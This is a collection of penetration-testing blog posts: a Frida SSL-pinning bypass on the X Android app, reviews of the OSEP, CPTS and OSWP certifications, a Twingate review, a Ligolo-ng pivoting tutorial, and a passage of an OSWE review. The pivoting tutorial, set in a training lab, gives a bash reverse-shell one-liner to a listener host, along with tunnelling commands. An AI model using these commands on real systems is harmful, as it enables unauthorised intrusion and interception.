Prerequisites

• An android emulator of choice

• Burpsuite (installed on host machine)

• Python packages

  • objection

    If you face issues post-installation:

      pip install --upgrade setuptools
    

  • frida

  • frida-tools

Configure Burp Proxy

on host

on emulator

Install Certificate onto emulator

Launch the browser and head to http://burp and download the CA Certificate.

Make sure to rename the cert to <name>.cer via the file manager.

Then head to the certificate settings on the respective emulator and install the newly downloaded certificate.

Frida Server

Releases · frida/frida (github.com)

download the unzip the respective frida-server versions, extract it and move it to the bin location of your emulator. In my case : D:\Program Files\Nox\bin

adb devices

verify that the adb interface is attached to the device.

adb push frida /data/local/tmp

Push the frida binary to the device via ADB.

D:\Program Files\Nox\bin>adb shell

cd /data/local/tmp/
chmod +x frida

Give the binary execute permissions.

./frida &

Run frida server in the background.

Bypass SSL Pinning

There are a ton of scripts developed by the community for frida which you can find here. We'll be making use of the frida-multiple-unpinning script for our use case.

frida --codeshare akabe1/frida-multiple-unpinning -U -f com.twitter.android

We can verify that the X AKA twitter app has opened up and the SSL pinning bypass is in effect.

We can then take a look at burp and ensure that we are able to see the raw requests sent by the X app to its api server.

For the last three months, I've been working through the PEN300 course by OffSec which is all about advanced evasion and breaching defenses. Just got news from OffSec that I passed the 48-hour exam, and I wanted to share how I got the OSEP certification and what helped me along the way.

Overview of the Course (PEN300)

Programing Theory & MS Office

The PEN-300 course, focusing on Advanced Evasion Techniques and Breaching Defenses, spans multiple learning modules. The initial few chapters provide a general course overview, covering Operating System, Programming Theory and Client-Side Code Execution with MS Office.

Programming Theory forms a significant part of the course, exploring areas such as executing shellcode in Word Memory, PowerShell utilization, and the intricacies of client-side code execution. The course covers creating a basic dropper in Jscript, execution with Windows Script Host, and revisiting in-memory PowerShell techniques.

Antivirus Evasion

Process Injection and Migration introduce concepts like antivirus evasion, DLL injection, reflective DLL injection, and process hollowing. Practical considerations, such as simulating target environments, locating signatures in files, and bypassing antivirus with various methods, are also heavily covered to expand the student's understanding of antivirus evasion.

Antimalware Scan Interface (AMSI) bypass techniques using PowerShell and JScript were also covered. The module provides comprehensive strategies for bypassing AMSI. The Application Whitelisting section delves into theories and setups, exploring basic bypasses and techniques to overcome AppLocker restrictions using PowerShell, C#, and JScript.

Network Filters

Bypassing Network Filters covers strategies for overcoming DNS filters, web proxies, IDS and IPS sensors, and full packet capture devices. Techniques like HTTPS inspection, domain fronting, and DNS tunneling are explored in detail. Domain Fronting was one of my favorite sections of the course.

Post Exploitation

The course extends its reach to Linux post-exploitation, kiosk breakouts, and lateral movement. Practical insights are provided on Linux lateral movement, Microsoft SQL attacks, Active Directory exploitation, and SSH lateral movement.

Windows Credentials modules cover aspects like local and domain credentials, Kerberos, and post-exploitation processing. Techniques for lateral movement with Remote Desktop Protocol (RDP), fileless lateral movement, and exploitation of Microsoft SQL in Active Directory are also comprehensively explored in the later chapters.

My Preparation Journey

Course Module Labs

Alongside the PEN-300 course are the interactive labs that complement each section, providing hands-on experiences for students. These labs are aligned with the specific tactics covered in each chapter, allowing students to actively apply the newly acquired knowledge in a practical setting. I heavily utilized these labs to repeatedly practice the tactics taught in the section.

Challenge Labs

The challenge labs represent an extra layer of complexity beyond the interactive labs. Within these labs, students encounter six separate networks featuring a mix of Windows and Linux hosts operating in an active directory environment, all fortified with active antivirus (AV) protection (windows defender). Students are tasked with navigating through these challenging scenarios, putting into practice the skills and techniques acquired throughout the course.

The challenge labs serve as a practical assessment, requiring students to apply their knowledge to overcome real-world obstacles, providing a comprehensive test of their proficiency in techniques taught throughout the course. I personally made full use of these 6 networks to try out various TTPs taught and used it as my own cyber range.

External Labs

I personally didn't utilize any external labs other than a tiny AD lab I have in my home lab. However, many past students I spoke to, recommended the Hack the Box Pro Lab, Cybernetics for some extra practice. Alot of the students I spoke to, told me that this was a very good addition to challenge labs and helped them gain more confidence with their methodologies.

Course Content

I was going through the content at a steady rate alongside the specific chapter's labs. I preferred doing it as I was learning compared to some students who read through the content completely before heading to the labs for some hands-on.

Challenges and Learnings

C

I wasn't particularly proficient in C#, especially when it came to building loaders and bypasses, which were emphasized in the course. However, I found that I didn't need an extensive knowledge of C#. Basic skills in the language, coupled with a solid understanding of fundamental antivirus (AV) bypass techniques, were sufficient for me to navigate through the challenges presented in the course.

Macros

Handling MS Office Macro malwares proved to be quite challenging in my personal experience, especially with MS 2016 as it spawns into a 32-bit context. The migration to another 64-bit process without a C2 framework added an extra layer of annoyance. Nevertheless, the course provides a foundational understanding, covering the basics. This knowledge is adequate for students to build upon and extend into a practical working solution.

Applocker + Constrained Language Mode

Navigating around Applocker and Constrained Language Mode presented a variety of options, which initially proved confusing for me, given that it was my first encounter with both simultaneously. However, after experimenting in the labs and learning through trial and error, I managed to find efficient solutions. It turned out to be a rather enjoyable challenge once I got the hang of it.

The Exam

Exam Network

The exam consists of one large network with multiple machines that must be compromised. Students are given 48 hours (47 hours and 45 minutes to be exact) to complete the examination and another 24 hours for report writing. The exam objective provides detailed explanations on how a student can pass the examination. In general, you must have 10 flags each worth 10 points.

The student would have to first obtain a foothold and then perform additional internal attacks following the initial compromise. There are multiple attack paths through the network that will result in the same level of compromise.

Some of the machines will require multiple exploitation steps, resulting first in low-level local access, and then in root or administrative privilege escalation. Other machines will be fully exploitable remotely.

-offsec

In my personal experience, I found the difficulty level of the exam to be reasonable when compared to the content covered in the course. Everything necessary to pass the exam is included in the course materials; you just need to make a few extensions to your understanding and skills.

Tips for Future Test-takers

Tools

Throughout the course, various tools and techniques are introduced. If you lack a tool or if it's an open-source tool without a public release, ensure to pre-compile and test it in the labs before the exam. Avoid wasting valuable time during the exam on these tasks.

Techniques

There are multiple ways to get to the same destination. Try every possible method/tool/technique to achieve the same goal. Things that work in certain environments do not work in others. I learnt this the hard way. Thankfully it was in the labs instead of the exam.

For instance, one of my interactive CLM bypasses refused to work in one of the labs and my interactive shell would simply die. However, running the commands in a PowerShell Runspace would succeed. Things like this I would've never known if I hadn't tried.

Labs

This is an obvious one. Redo the labs and practice note taking alongside. Doing it once doesn't suffice (unless you're doing this as your day job).

Conclusion

In conclusion, the journey to obtaining the OSEP certification through the PEN-300 course has been a challenging yet immensely rewarding experience. Over the course of three months, I delved into advanced evasion techniques, breached defenses, and honed my skills in a dynamic and practical setting.

The exam, while appropriately challenging, proved manageable with the knowledge gained from the course. The emphasis on practical skills and the provision of necessary resources within the course materials made the exam preparation a smoother process. A piece of advice for future test-takers: familiarize yourself with tools beforehand, avoiding unnecessary hurdles during the exam.

Overall, the OSEP certification journey has not only expanded my technical capabilities but has also instilled a problem-solving mindset crucial in the realm of offensive security.

Introduction

Twingate is a cloud-based service that provides secured remote access to an organization’s networks. It’s function is very similar to a business VPN. Twingate makes Zero Trust Network Access (Yes, Buzzword. I know) easy to deploy, even easier to use, and always secure. It establishes direct peer-to-peer connections to protected resources, with each request verified before it ever leaves the device.

How Twingate is Revolutionizing Remote Access

Resources Based Access

Most commercial VPNs allow you to access internal networks whereas Twingate allows the declaration of individual resources as shown below:

A resource on your network can be any of the following:

• A Fully Qualified Domain Name (FQDN), eg. host.autoco.internal

• An FQDN using one or more wildcards, eg. *.host-0?.autoco.internal, where * represents 0 or more characters and ? represents exactly 1 character.

  • Wildcards like *.autoco.internal match anything to the left of .autoco.internal

• An IP address, eg. 10.1.0.35

• A valid IP CIDR range, eg. 10.1.0.0/16

The underlying reason for declaring network resources in such a manner will become apparent in the next few sections.

Native Access Control Lists

Twingate uses Access Control Lists (ACLs) to secure resources both internally and externally. ACLs consist of tables that define access permissions for network resources. They are built into network interfaces, operating systems as well as enabled through Windows Active Directory.

When onboarding a new resource, the admin is able to entirely control Port restrictions and Internal Domain names as shown above. Most traditional VPNs do allow subnet routing. However, resource-specific rules and restrictions have to be configured on your internal firewall. That changes with Twingate.

Twingate also offers granular permissions which allow you to define access to individual resources with custom policies and groups, enabling narrow access permissions. This kind of implementation has become a basic necessity in a world where people work from anywhere.

Users & Groups (AAA-like)

Now that we've declared our network resources and setup restrictions, let's take a look at what makes Twingate so special.

Traditional VPNs require the remote user to establish a connection to the VPN server and, once they prove they are an authorized user, they are granted access to the network behind the server, as if they were sitting at a computer in the office and on the network.

Larger companies may also have multiple networks which need to communicate with each other. This requires building a complicated network of VPN connections between them and letting users connect to multiple VPN servers.

This is where Twingate's Zero Trust Networking comes into play. ZTN, a network access framework, operates on the fundamental concept that both the network itself and the users seeking to link with corporate assets are regarded as untrusted, thus the term "zero trust." Given this premise, maintaining security mandates a thorough examination and validation of every endeavor to reach a confidential resource. This validation includes confirming the user's identity as they assert (authentication), and ascertaining their entitlement to reach the specific resource in question (authorization).

How it works:

We have 2 active users declared in our network.

We also have 3 operational groups.

We're able to assign active users to operation groups as shown above.

We are able to assign groups to resources which determines their access to the resource.

The configuration is pretty modular as shown above and we are also able to assign multiple groups to a particular resource.

Architecture

Twingate relies on four main components

• Controller

• Clients

• Connectors

• Relays

Together, they ensure that only authenticated users are able to access the Resources that they have been authorized to access. Here's how they all work in conjunction.

Controller

The Controller's responsibilities encompass various tasks such as storing configuration changes from the Admin console, delegating user authentication to third-party identity providers, and generating access control lists (ACLs) for both clients and connectors. These ACLs define authorized resource access for users and network destinations for connectors. The Controller also plays a role in registering and authenticating deployed connectors, requiring one-time authorization and establishing anonymized unique IDs for identification, ensuring secure communication with Twingate Clients.

Client

The Twingate Client application (Pretty self-explanatory, like your Openvpn Connect), installed on users' devices, serves as a crucial authentication and authorization proxy for user requests to private Resources. It establishes TLS tunnels with designated Connectors which ensures secure and efficient access to protected Resources, all orchestrated at the Client's edge.

Connector

The Connector, serving as the counterpart to the Client, takes on a simpler yet significant role. Designed to be placed behind a private Remote network's firewall, the Connector's core responsibilities include establishing and upholding communication with the Controller. (Basically the node in your network, something like argo)

Relay

The Relay is the simplest component in the Twingate architecture. No data or network-identifiable information is stored in the Relay and no data-carrying connections are terminated at the Relay. The Relay can be considered to be the equivalent of a TURN server in WebRTC nomenclature.

Access

Desktop

Accessing your remote resource is as simple as downloading your corresponding agent from their website and blazing through the following steps.

Once authenticated successfully, you should only see resources that have been delegated to you or the group that you belong to. It's that simple. You can now access that resource without any issues.

ssh ubuntu@192.168.18.18

Mobile

And that's it! Additionally, if you were on a traditional VPN, your general network traffic (by default) would flow through the VPN server which exhausts the VPN Server's bandwidth unnecessarily forcing the server to be scaled. With Twingate, your general traffic goes out through your device's network card unless specified otherwise.

Logging

Recent Activity

Twingate allows the admins to track recent activities related to each resource.

Reports

Twingate also allows admins to generate reports in bulk and review them as shown:

Setup Process

The setup process is fairly straight forward.

Prerequisites

• An in-house node running 24/7

Installation

Remote Network

The first step is to add a remote network. Name is whatever and select the location accordingly.

Connector

The next step is to install the connector on our local node. There are a ton of deployment methods to choose from and I went with Docker as expected.

Configure the connector to your liking and paste the command into your node as shown below

.

Once we see that the connector is up, we are ready to go. However, Twingate does provides 2 connectors by default for redundancy.

Now we're ready to add resources, port restrictions, users & groups as discussed above! It's that simple.

Conclusion

Pros (+)

• Extremely simple setup & management process for admins

• Extensive ACL control over resources

• Lessens company network load by directing non-business data straight to the internet

• Handles DNS queries within the remote network, preserving typical hostnames and IP functionality.

• Wide support for client operating system

Cons (-)

• Involvement of an external entity (Twingate) in your system access

  • They do explain the restricted access extensively on their docs and talk about how they have no access to any data.

• Possibly not fitting for organizations with rigorous security/privacy needs

Remote access solutions are moving towards zero trust security. According to Forbes, implementing a zero trust access (ZTA) solution over traditional secure remote access solutions delivers one of the best frameworks needed in today’s digital era. It operates on the principle of “never trust, always verify,” ensuring that users and devices are continuously authenticated and authorized before accessing designated resources

ZTA can help protect against everything from simple malware to advanced persistent threats to insider threats. It can not only help prevent attacks outright, but also stop lateral movement, or otherwise mitigate, an attack in progress.

PSA: There are a few other tools that achieve the same goals as Twingate which doesn't depend on an external entity for your private system access. (E.g ZeroTier / Nebula)

Follow up (?)

I might discuss how tools like such can be used by attackers to run around in your network 🥲.

-Nee

Having spent a considerable amount of time immersed in web-related attacks in the AWAE labs over the last 4 months, I began to feel a sense of detachment from the realm of Active Directory (AD) exploitation and pivoting. Now that I was done with the web attacks for the time being, I wanted to return to the Active Directory side of things and was looking for something to help hone my skills in this domain (haha...). That's when HTB's CPTS popped back into my radar. I initially came across the CPTS roughly 9 months ago when it was first announced.

HTB Certified Penetration Testing Specialist (HTB CPTS) is a highly hands-on certification that assesses the candidates’ penetration testing skills. HTB Certified Penetration Testing Specialist certification holders will possess technical competency in the ethical hacking and penetration testing domains at an intermediate level. They will be able to spot security issues and identify avenues of exploitation that may not be immediately apparent from searching for CVEs or known exploit PoCs.

Having completed the course and cleared the exam, I felt compelled to share my experience and provide valuable insights for those who are interested in embarking on this journey or for those who are simply curious. As always I'll be splitting up the review into several parts.

Background

My experience with Active Directory (AD) has been a mix of exploration and hands-on learning. While my AD experience may not be extensive, I've built my own minimal AD environment in my home lab which allowed me to gain practical experience in setting up and configuring AD components, as well as understanding the intricacies of user management, group policies, and authentication mechanisms.

The greater chunk of my AD exploitation knowledge comes from the CRTO (Certified Red Team Operator) course which I had enrolled in last year which provided me with a deep understanding of the various AD attack vectors. From reconnaissance and privilege escalation to lateral movement and persistence techniques, I acquired a solid foundation in AD exploitation through the CRTO course materials. Even though the iteration of OSCP I took did cover AD, I wasn't evaluated for it on my exam.

On top of these, I passively engaged in various challenge labs that focused on AD from time to time. These helped with the labs and challenges throughout CPTS.

The Course

Penetration Tester Path

The Penetration Tester Job Role path is what you've to go through before being eligible to take the exam. This is the course that accompanies the exam. The course is extremely well put together and consists of the following domains:

• Web attacks

• Local Privilege Escalation (Windows & Linux)

• Post-exploitation

• Basic C2 (Metasploit Framework)

• Active Directory Enumeration & Attacks

• Pivoting & Lateral Movement

• Penetration testing processes

• Vulnerability Assessment & Reporting

👍The Good

The course content was of high quality and was accompanied by individual labs that apply the concepts taught in the module.

This is a snippet of some of the modules in the ACTIVE DIRECTORY ENUMERATION & ATTACKS section. Modules with the cube icon imply that they contain interactive labs to practice the theory taught.

There are roughly about 500 exercises and tasks that you'll go through while embarking on the penetration tester path. The course covers quite a number of domains and it does it well. Fundamentals are well explained and easy to understand. I learned a couple of interesting techniques from the modules given my experiences.

At the end of most modules, there's a Skills Assessment section which usually consists of a multi-part exercise or exercises of varying difficulty. The Skills Assessment does not come with a guided walkthru / theory writeups like other chapters. They consist of all possible attack vectors learned in the entire module. They are also a good gauge to see where you stand and if you're able to solve challenges without some form of hand-holding.

At the end of the course, you'll face this module called ATTACKING ENTERPRISE NETWORKS. This module covers all aspects of a penetration test from start to finish. You'll work through a simulated External Penetration Test resulting in internal network access and ultimate compromise of the Active Directory environment. Most importantly, this module walks through each and every step toward Domain Dominance. It's highly advised to go through this network without the walkthrough. It helps give an estimate of how ready you are for the examination.

This network is also what I based the Ligolo-ng write-up on. Its a well-put-together lab that consists of web attacks, active directory exploitation, pivoting through multiple subnetworks and more. I personally enjoyed this end of course exercise. After going through it blind, I'd definitely recommend others to go through it a second time with the walkthrough. The walkthrough addresses some of the attacks that should be done while on an engagement even though they may not yield valuable results. This includes password spraying, LLMNR spoofing, kerberoasting all possible accounts and more. And as always, taking good notes throughout the practice engagement definitely helps in the exam! Though, being able to do this blindly might not necessarily mean that you're ready for the exam. Mileage varies based on experience!

One of the best thing about the platform was the Global Search. This search allows students to search for anything site-wide. Super useful when it comes to finding a certain technique.

The HTB CPTS certification course not only offers immense value but is also priced exceptionally well. Each dollar spent on this course is truly worth it, considering the high quality and comprehensive content it provides. The attention to detail and the expertise of the instructors shine through every module.

You could pay the $490 to get access to all Tier II modules and an exam voucher (which comes with a free retake) or....

if you have access to your personal .edu mail, you could pay $8 a month for the same level off access and purchase the exam voucher separately for $210

*All prices are in USD*

👎The Bad

My iteration of this section will probably be different from yours but hey here are things that I found to be iffy for me.

The Text

The course was a bit too wordy for me and I'm sure this is probably a me problem. I'm more of a visual learner and I prefer video walkthrough's where I can see things in action and learn.

However, the course did have extensive screenshots and code snippets to make up for that. I'd still have preferred videos. Each to their own I guess.

Forced 100% Course Completion

The other issue I had with the course was that students were forced to complete all tasks and challenge labs that come with the Penetration Tester job-role path before they could start the examination process.

This puts students with prior experience at a slight disadvantage. Experienced students would have to sit through sections that they are already well versed in and painstakingly complete the corresponding challenge labs.

I get why they're doing this but there should be some sort of opt-out program that helps seasoned students.

The Exam

About

The candidate will have to perform blackbox web, external and internal penetration testing activities against a real-world Active Directory network hosted in HTB’s infrastructure and accessible via VPN (using Pwnbox or their own local VM). Upon starting the examination process, a letter of engagement will be provided that will clearly state all engagement details, requirements, objectives, and scope. All a candidate needs to perform the required penetration testing activities is a stable internet connection and VPN software. HTB Certified Penetration Testing Specialist is the most up-to-date and applicable certification for Penetration Testers that focuses on both penetration testing and professionally communicating findings.

Candidates are given 10 days to complete the exam and the corresponding report. The exam consists of multiple networks (External & Internal). It covers most if not all domains taught in the course.

There are a total of 14 flags spread across multiple machines on the network which add up to 100 points. Candidates require at least 12 flags (85 points) with a comprehensive report to pass the examination. The general flow of the exam is very similar to the ATTACKING ENTERPRISE NETWORKS module but the complexity varies heavily.

My Experience

I cleared the exam with all 14 flags and 100 points. I personally used up all the time given for both the report and the actual exploitation.

The first couple of hours were pretty draining. Just extensive Enumeration of all services exposed and a lot of note-taking. I was also mentally coming up with diff paths that could be viable. Including some questionable ones (🤔).

After a couple more hours of enumeration, I had the ball rolling....or at least I thought so. There'd be one major move followed by a couple of minor steps which was simpler compared to the bigger hurdle.

Here's something a friend of mine said to me while I was stuck at one of the lateral move steps:

If you're stuck for too long on a single target, it means that you are stuck on a single way of thinking.

It's cliche but taking a break during those long hour sessions really does help. The exam lab is extremely well made and I found it to be pretty diverse in terms of attack vectors. Extremely comparable to other exams labs I've crunched through. Its right up there.

Overall, the exam is definitely challenging & draining but pushes the candidate to apply everything that was taught during the course. I don't think there was knowledge from any chapter that wasn't applied in the exam. The exam also teaches students time management and the importance of reporting.

Reporting

Reporting was a big thing throughout the exam. I've always been used to taking raw notes and reporting all at once at the end of the exam. I found that to be a bit exhausting this time around given that it was a comprehensive engagement. I plan to report as I go from now on. We'll see how that goes.

HTB Provides students with a report template and highly advises students to make use of their template as it sort of tells students what they're looking for and makes grading the exam easier for them.

Here are a few snippets of the report template given to the students at the start of the examination. The report requires students to provide a full walkthrough of the engagement. Showcasing how the pentester went from having no access to gaining Root access / Domain Dominance.

Conclusion

In conclusion, the HTB CPTS certification has proven to be a valuable and transformative learning experience for me. This course has provided me with the opportunity to delve into the world of AD exploitation and address the areas where I felt a lack of knowledge. However, the course does cover more than just AD as mentioned in this writeup. The comprehensive curriculum and hands-on approach have allowed me to bridge some of the gaps in my understanding.

In summary, I recommend the HTB CPTS certification to individuals eager to deepen their understanding of offensive security (& AD Exploitation for that matter). This course provides a comprehensive and practical foundation for addressing various security challenges and honing penetration testing skills.

With that out of the way, on to the next! 😁

- Nee

Greetings, fellow cyber peoplez! Just wanted to give you guys some insight into my journey towards earning the Offensive Security Wireless Professional (OSWP) certification. In this blog post, I will take you through some of my experiences throughout this certification and how I tackled some of the issues I faced.

The PEN-210 (OSWP) is considered a foundational course alongside the PEN-200 (OSCP). In comparison to the challenging PEN200 certification(💀), the OSWP certification can be seen as a more approachable step in the journey towards wireless network security. In other words, it's not as tough!

Background

I've had little to no (practical) experience pentesting wireless networks before this. However, I was familiar with the aircrack suite and cracking tools that can be used in conjunction with it. I had a wifi pineapple for a little while and was experimenting with it couple of months ago.

Thus, I was looking forward to getting more hands-on experience with this course. I'm proficient in setting up wired networks but that proficiency didn't carry over to the wireless side of things while setting up the labs.

Gear

Router

• NETGEAR AC1000 (R6080)

• Linksys WiFi 5 Router Dual-Band AC1200 (E5400)

Offsec recommends the routers mentioned above to all students taking the course. However, they're pretty old (as expected) and the availability of the router depends heavily on where you're based out of. Fret not, there were some alternatives that saved me.

DD-WRT

DD-WRT is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.

After some intense g00gling, I came across dd-wrt which was the evolved version of OpenWrt. I had this extremely old D-Link dir-868L sitting around collecting dust in my rack.

Luckily enough dd-wrt had custom firmware for it and I was able to flash it with no issues. If you were going to purchase the recommended router, I'd recommend looking into dd-wrt to check for your old router's compatibility before wasting some cash.

Wireless Adapter

• Alfa AWUS036NHA

• For wireless card compatibility, please refer to the Aircrack-ng wiki

For the wireless adapter, Offsec recommends students to get the Alfa adapter mentioned above or rever to the Aircrack wiki and pick one of their liking.

However, I ended up getting an Alfa AC1900 which was slightly overkill. After the card arrived, I realized that the Kali did not support the adapter out of the box. Thankfully the fix was as simple as installing the following package.

apt install realtek-rtl8814au-dkms

Shoutout to this kind soul over in the Amazon reviews section😂.

Labs

With the gear out of the way, let's discuss labs. To make things somewhat difficult, the course did not come with any labs. This would explain why offsec had to recommend routers. Students were required to set up most if not all the labs by themselves. However, there were a ton of guides on how to set up the following networks for attacking. (WEP, WPA[1/2/enterprise], WPS).

Setting up the various networks with dd-wrt wasn't too complicated. The process was pretty much the following:

• Find a guide

• Find the corresponding setting on my dd-wrt GUI

• Wait for the network to go up

The "annoying" part was actually getting a client to connect to the network constantly and capture the attack. I just ended up using another VM with a wifi adapter passed through.

Do keep in mind to verify that your router is not using 802.11W as that would prevent deauth attacks and make it tougher for you to capture the handshakes.

The Exam

My Experience

The exam was pretty straightforward. I was presented with 3 different types of networks to attack and had to successfully compromise 2 out of the 3 networks to pass. However, there was a guideline that stated that cracking 1 of the networks was mandatory to pass. This basically meant that you could only "choose" one other network to compromise.

My exam environment was pretty stable (for the most part). When I was sniffing on one of the networks, I was only getting stations. Thankfully that issue was solved with a simple revert.

Word of advice, don't limit yourself to the tools within the coursebook. There might be another tool out there that might get things done with a little bit more ease even though the end product is the same.

Thoughts

Overall, the exam was pretty doable as long as you went through the courseware and familiarised yourself with the commands and processes! Reporting was as simple as other offsec examinations. Modify the given template to your liking and submit!

Conclusion

I enjoyed the PEN-210 and understood some fundamental content and debunked a few misconceptions of mine. Was definitely less stressful compared to the other offsec courses I underwent. Hope this helps someone out there, all the best for your attempt!

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

Background

Pivoting is a technique used by attackers to move from one compromised system to another. This can be a valuable tool for attackers, as it allows them to expand their reach and access more sensitive data.

By pivoting, pentesters can gain access to systems that would otherwise be unreachable. I've been working through a couple of labs recently and it has made me realize how painstaking manual pivoting is.

I have used a variety of tools for pivoting, including chisel, shuttle, SSH reverse port forward paired with proxychains, ngrok and plink. However, I have found that these tools can be cumbersome and difficult to use (when there are multiple networks stacked on top of each other). During my lab time with Cobalt Strike, I realized how easy pivoting with a C2 framework was.

Recently, I discovered a new tool called Ligolo-ng written by Nicolas Chatelain that I found to be much more user-friendly and effective in what it does. Upon usage I found Ligolo to be a C2 framework just for pivoting & proxying. I'd be covering the setup, usage and practicality of this tool in this post!

Video Demo

Here's a video demo showcasing the tool's capability! This'll help you decide if you should continue reading.

Network

NETWORK A - 10.129.203.0/24
NETWORK B - 172.16.8.0/24
NETWORK C - 172.16.9.0/24

DMZ01 - Connected to both Network A & B
DC01  - Connected to both Network B & C

This is the network that we'll be pivoting through and testing this tool on. Our first pivot will be on DMZ01 to enable us to access Network B and the following double pivot would be on DC01 to enable us to access Network C.

Prerequisites

Pick your poison and meet me over at the next section!

Compiling Binaries

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Precompiled binaries

Terminologies

PROXY SERVER = C2 / Kali Box
AGENT = pwned host / victim box

Setting up the Proxy Server

This section will cover setting up of the Proxy Server on the Kali Box

Creating a TUN Interface

sudo ip tuntap add user nee mode tun ligolo
sudo ip link set ligolo up

Verifying Interface

ip a

Starting the Proxy Server

./proxy -selfcert

Running ./proxy -autocert will generate legitimate certificates using Let's Encrypt.

Setting up the Agent

RED - Hosts reachable
BLUE - Established Pivot Tunnel

Once we've set up the agent on DMZ01, we'd have owned 2 networks and we'd be able to access all hosts on Network B using the pivot on DMZ01.

DMZ01

We can see that the DMZ01 host has 2 network adapters. However, from our KALI we are only able to hit the 10.129.203.0/16 network before the pivot.

Connecting to Proxy Server

./agent -connect 10.10.15.146:11601 -ignore-cert

Now that we're successfully connected we can head back to the Kali box and add an ip route. This is to let our Kali box know which interface to use whilst accessing the pivot networks.

Adding a new route on Proxy Server

sudo ip route add 172.16.8.0/24 dev ligolo

Checking Connectivity to Hosts on Network B

ping 172.16.8.3

cme smb 172.16.8.0/24

Nice! We're able to reach Network B thru our pivot 👍

Double Pivot

This is where things usually get a little chaotic. Usually we'd have sshuttle running on the initial pivot and we'd put in place a SSH reverse port forward or a SOCAT port forward on the initial pivot to send connections back to the Kali box and then use something like chisel to establish a tunnel with the double pivot box.

With Ligolo, we're able to do something similar to cobalt strike's rportfwd. The rportfwd command on cobalt strike will bind a port on the compromised target and relay all incoming traffic to a specified host and port. Ligolo is able to perform this exact task with the listener_add command. This eliminates the need for multiple SSH reverse port forwards. Everything can be done within the same tunnel. Let's take a look at how that's done.

RED - Hosts Reachable
BLUE - Established Pivot Tunnel

With the help of listener_add on DMZ01, we're able to establish a secure tunnel with the DC which we can use to directly access Network C without proxychains (🤢)!

Creating a Listener

(The box that is connected to both Network A and Network B)

on the initial pivot to send the new host's traffic to the Proxy server so that its able to establish a tunnel.

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
listener_list

Connect Double Pivot box to Proxy Server

(The box that is connected to both Network B and Network C)

./agent.exe -connect 172.16.8.120:11601 -ignore-cert

Start Tunnel

(On Proxy Server)

Adding a new route on Proxy Server

sudo ip route add 172.16.9.0/24 dev ligolo

Checking Connectivity to Hosts on Network C

ping 172.16.9.25

nmap -Pn -p 22 172.16.9.25

ssh -i ssmallsadm.key ssmallsadm@172.16.9.25

Catching Reverse Shell via Double Pivot

RED - Hosts Reachable
BLUE - Established Pivot Tunnel
GREEN - Reverse Shell Traffic

Since we are now able to reach the various networks directly, a reverse shell isn't the most ideal. A bind shell would be the most efficient. However, if given a scenario where we aren't able to bind to ports on a particular box, let's take a look at how this can be done.

Instead of having to forward ports from MGMT01 → DC01 → DMZ01 → Kali, with Ligolo we could create a listener on DC01 which would directly forward traffic to our Kali box via the existing tunnel!

Creating a Listener

listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:9001 --tcp

Listener #1 will now forward all traffic hitting DC01:9001 to the PROXYSERVER:9001. (You could also forward it to another host if necessary)

Triggering & Catching reverse shell

MGMT01

sh -i >& /dev/tcp/172.16.9.3/9001 0>&1

KALI

nc -nvlp 9001

Thats all there is to it!

Hope this helps someone out there who's having a hard time double / tripple / quadruple / quintuple pivoting with the usual toolz!

It's been a while since I wrote one of these and I'm thrilled to share with you my journey to becoming an Ofsec Web Expert (OSWE). As someone who's always been interested in web application security, earning the OSWE certification has been a major accomplishment for me both personally and professionally.

In this blog post, I'll give you a glimpse into my background in web application security, and share my experience studying for the certification exam. I hope that by sharing my own story, I can inspire and guide others who are on a similar path.

So, whether you're a fellow security enthusiast, a student just starting out, or my future employer, I invite you to join me as I reflect on my journey and share some tips and insights along the way. Let's dive in!

Background

Professional

I am a cybersecurity enthusiast with limited experience in web application security. My passion lies more in finding vulnerabilities and exploiting them rather than in coding. I have a solid foundation in cybersecurity and penetration testing, but not the same for web exploitation. I have worked on various security projects in the past, including vulnerability assessments, penetration testing, and incident response.

Education & Certifications

I have a background in Information Technology and hold a couple of red certs like the OSCP and CRTO, networking certs and server-sided certs like the RHCSA. Although coding is not my strong suit, I do have some experience in PHP web application development which has given me a basic understanding of web application architecture. I also consider myself a scripter and not a coder 😂. Hope that changes soon tho...

Motivation to Pursue OSWE

Despite my background in offensive cybersecurity, I had a strong interest in web application security and wanted to learn more about it. I decided to pursue the Advanced Web Attacks and Exploitation (AWAE) course to deepen my knowledge and skills in this area and more specifically a white box approach. Although I knew that digesting the various coding languages would be a challenge for me, I was motivated to push myself and expand my skill set to become a more well-rounded cybersecurity professional.

Preparation

Out-of-Lab Preparation

Before stepping into the offsec labs, I preped for the course by completing a couple of the BurpSuite labs and building Python scripts to automate the exploitation of the challenges. I found that this helped me build up my scripting ability, specifically in using the requests & sockets library to interact with web applications. By automating the exploitation process, I was able to gain a deeper understanding of how different web application vulnerabilities could be exploited and how to craft custom payloads and incorporate them into the exploitation chain. I also practiced using various BurpSuite extensions to assist with manual testing and vulnerability identification.

Offsec Labs

Guided Labs

The Offensive Security labs for the OSWE were definitely challenging and rigorous given my background. But they provided an excellent learning experience. The labs covered a wide range of web application vulnerabilities, including injection attacks, broken authentication and session management, cross-site scripting (XSS), and more.

The lab materials were well-written and provided clear guidance on how to identify and exploit the vulnerabilities. However, the labs also required a lot of independent research and experimentation to fully understand and exploit the vulnerabilities, which I found to be both frustrating and rewarding.

I also appreciated the ability to use the lab environment to test out new techniques and hone my skills. The lab environment was realistic and walked the students through real-world (outdated) applications and their exploitation techniques. Additionally, the lab environment was well-designed and easy to use, which allowed me to focus on learning and exploiting vulnerabilities instead of struggling with technical issues (I'll get to this in the next few sections lol). Overall, the lab experience was challenging and time-consuming, but it was also one of the most valuable parts of my preparation for the OSWE exam.

Extra-Mile Exercises

